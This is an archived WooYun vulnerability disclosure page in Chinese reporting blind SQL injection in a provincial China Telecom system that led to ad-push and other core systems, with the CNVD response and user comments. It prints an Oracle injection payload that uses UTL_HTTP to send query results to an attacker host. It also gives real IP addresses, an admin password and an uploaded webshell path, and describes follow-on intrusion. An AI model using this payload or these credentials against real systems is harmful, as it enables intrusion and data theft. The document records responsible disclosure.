当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2013-034945

漏洞标题:某省电信核心系统漏洞可劫持PUSH与N+1系统等

相关厂商:中国电信集团

漏洞作者: 小明是黑阔

提交时间:2013-08-22 08:50

修复时间:2013-10-06 08:51

公开时间:2013-10-06 08:51

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2013-08-22: 细节已通知厂商并且等待厂商处理中
2013-08-27: 厂商已经确认,细节仅向厂商公开
2013-09-06: 细节向核心白帽子及相关领域专家公开
2013-09-16: 细节向普通白帽子公开
2013-09-26: 细节向实习白帽子公开
2013-10-06: 细节向公众公开

简要描述:

某省电信核心系统存在盲注,之前我报过没通过看到有马甲号报了再报次详细经过吧。。PUSH(广告推送)\N+1(防止多人上网)\P2P(定时限制P2P速率)\等等。。多套系统。。

详细说明:

电信广告推送由来已久,单没人深入调查过,正如我微博上说的,我和小伙伴门调查了该系统。同时拿下了周边很多核心系统,然后发散开来覆盖了3个省共可劫持1000多万宽带用户。
首先广东省入手,弹出回访调查
http://59.37.54.194:3606/111223/InstallRevisit.aspx
该IP1000端口有个废弃的业务管理系统
http://59.37.54.194:1000/
http://121.32.136.21:1000/
http://202.104.214.67:1000/

存在盲注。。。。
用户名输入
'and 1=1||( select UTL_HTTP.request('http://XXXX:1000/oracle.php?'||(select banner from v$version where rownum=1)) from dual) and '1'='1
可以把查询转出出来。。由于数据库权限问题,可以读取到PUSH等系统的数据库用户密码,密码虽然加密的,是可以破解。
如1+n系统
http://121.15.207.32:4000/Login.aspx
然后就查到PUSH系统地址总管理地址
https://push.10000.gd.cn:447/
内部是不同的IP地址哈。。
总登录用户是
root
123456Ab
很弱智的密码。。。
然后就可以控制整个省的push。。
由于push可以直接上传webshell且权限挺高,可以提权等。。
又做了后期渗透,拿下了不少权限的机器。但后来清理后门后公开这个了。。
本来想7月7日注册账号,8月8日报电信,9月9日报移动,但是上次疯狗没给通过。。。看到有人马甲号报了类似。。感觉不爽,辛辛苦苦搞的洞子让别人报了。。。

漏洞证明:

1111.jpg


4.jpg


这是上面查询语句接收端生成的结果文本。。。
语句有经验的人应该懂

5.jpg


废旧系统权限

3333.jpg


http://121.32.136.21:3600/uploads/2013/8/22/f72647a5d4364dcc944fd74d687cc705.aspx
哎。。上传就到这里吧。。。后面提权大家都会的。。不再演示了。。
总之安全问题很大。。还希望电信部门重视,也希望通过吧。。

修复方案:

按照等保与电信行业标准做事。。不要拿用户开玩笑。。。

版权声明:转载请注明来源 小明是黑阔@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:20

确认时间:2013-08-27 08:35

厂商回复:

CNVD确认并复现所述多个实例情况,已经在22日作为重要事件通报给中国电信集团公司处置。
rank 20

最新状态:

暂无


漏洞评价:

评论

  1. 2013-08-22 08:52 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    屌炸

  2. 2013-08-22 09:25 | 小明是黑阔 ( 实习白帽子 | Rank:34 漏洞数:2 | 当万能的小明成为黑阔天朝将会变成怎样?)

    @一只猿 没有屌炸什么的,就是希望电信对用户负责。。。漏洞微博已经发出一个月无任何反应。下次会发其他运营商的PUSH,个人感觉信息安全方面最不靠谱运营商为电信。。

  3. 2013-08-22 09:48 | 一只猿 ( 普通白帽子 | Rank:463 漏洞数:89 | 硬件与无线通信研究方向)

    @小明是黑阔 估计是被日习惯,没感觉了

  4. 2013-08-22 13:17 | 无敌L.t.H ( 路人 | Rank:21 漏洞数:4 | ‮……肉肉捉活,亭长放解)

    @小明是黑阔 正常,电信做得最大,也最老,大把人得靠他吃饭。

  5. 2013-09-16 08:59 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    小明?熊海明…吗?

  6. 2013-09-16 11:47 | 小明是黑阔 ( 实习白帽子 | Rank:34 漏洞数:2 | 当万能的小明成为黑阔天朝将会变成怎样?)

    @wefgod NO~不过也是安全顾问+某组织(NoGFW)核心成员。。。低调,低调

  7. 2013-09-26 10:32 | Xhm1n9 ( 实习白帽子 | Rank:57 漏洞数:13 | bug)

    @wefgod -,-!!

  8. 2013-09-26 15:30 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @Xhm1n9 这才是真身呢

  9. 2015-05-12 12:30 | loli 认证白帽子 ( 普通白帽子 | Rank:550 漏洞数:52 )

    @Xhm1n9 活捉一只戴两个核心帽子的